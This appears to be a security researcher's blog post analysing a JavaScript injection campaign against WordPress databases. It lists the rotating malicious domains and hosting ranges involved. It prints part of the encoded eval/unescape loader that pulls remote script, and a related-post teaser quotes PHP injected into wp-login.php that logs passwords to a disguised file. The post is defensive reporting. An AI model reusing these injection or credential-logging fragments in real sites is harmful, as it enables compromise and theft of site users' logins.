Database injection, lessthenaminutehandle.com and more updates

  • April 1, 2011

We posted a few weeks ago about a large scale database injection attack affecting WordPress on shared hosts. The infected sites got the following javascript malware inserted on every post of their database (generally the wp-post table on WordPress):

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..

Which after decoded, attempted to include and load the following link: lessthenaminutehandle.com/js.php?kk=33

We also saw multiple variations of it, where the following domains where used as the main intermediaries:

http://lessthenaseconddeal.com/ll.php?k=09
globalpoweringgathering.com
lessthenaminutehandle.com
lessthenaseconddeal.com
welcometotheglobalisnet.com

What is interesting is the number of sub-intermediaries that change every few hours:

antivir1.mooo.com
antivirus-3654.co.cc
aqfwbngy.co.cc
defender-dyxa.co.cc
defender-kwwh.in
defender-wqga.in
defender-wtln.co.cc
pfoencut.co.cc
software-wujy.co.cc
system-scanner-ryes.co.cc
system-scanner-uemo.co.cc
system-scanner-uotu.co.cc
zgfozmcr.co.cc
antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.powerkbsentinel.rr.nu
www3.powernhgmdftkcleaner.myfw.us
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.smartsystemscanro.myfw.us
www3.specialprotectionti.rr.nu
www3.strongcheckera.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.avguardianpp.myfw.us
www4.avguardianst.myfw.us
www4.bestuhzscanner.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.strong-oppinternet.in
www4.thebestcheckernar.myfw.us
www4.top-only-scanner.uni.cc

They are using domains on multiple TLDs (.net, .com, .in, .us, etc) and changing every hour. The most common network for these to be hosted are at: 65.23.153.0/24 and 46.252.130.0/24, but that changes often as well. We will keep you posted as we track them…

If you are worried your site might be vulneable, scan it here: http://sitecheck.sucuri.net

If your site is infected with malware or blacklisted, we are here to help.

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags
Related Categories
You May Also Like
Labs Note

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post